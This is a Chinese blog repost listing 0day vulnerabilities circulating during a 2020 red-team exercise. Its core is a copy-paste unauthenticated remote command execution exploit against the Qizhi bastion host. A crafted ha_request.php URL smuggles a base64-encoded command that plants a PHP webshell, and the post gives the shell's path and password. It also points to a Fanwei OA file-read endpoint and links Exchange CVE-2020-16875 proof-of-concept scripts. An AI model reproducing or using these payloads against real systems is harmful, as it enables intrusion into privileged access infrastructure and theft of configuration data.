HW第二天:0day快递盒在线送day

截止到2020年9月12日:0day清单

转自F11Team

齐治堡垒机前台远程命令执行漏洞

漏洞利用:

利用条件:无需登录:
第一

http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马

/var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

特征:
漏洞利用点:

https://10.20.10.10/ha_request.phpPoc 形式:${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}-d|bash`|${IFS}|echo${IFS}

泛微OA云桥任意文件读取漏洞

利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。

多款Huawei产品越界读取漏洞

 

参考链接:https://www.cnvd.org.cn/flaw/show/CNVD-2020-36735

 

Exchange Server 远程代码执行漏洞(POC未验证)

CVE-2020-16875: Exchange Server 远程代码执行漏洞(202009月度漏洞)

ps 版POC:https://srcincite.io/pocs/cve-2020-16875.ps1.txt

py 版POC:https://srcincite.io/pocs/cve-2020-16875.py.txt

 

网传:山石SG-6000设备存在漏洞 

官方辟谣称 该公告并不是指设备本身存在漏洞,而是某个使用山石网科网络安全设备的管理员安全意识不足,配置不当导致,实属于事件型安全漏洞。

参考链接:https://mp.weixin.qq.com/s/lg2ttFSIybginh6KNS-SGQ

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值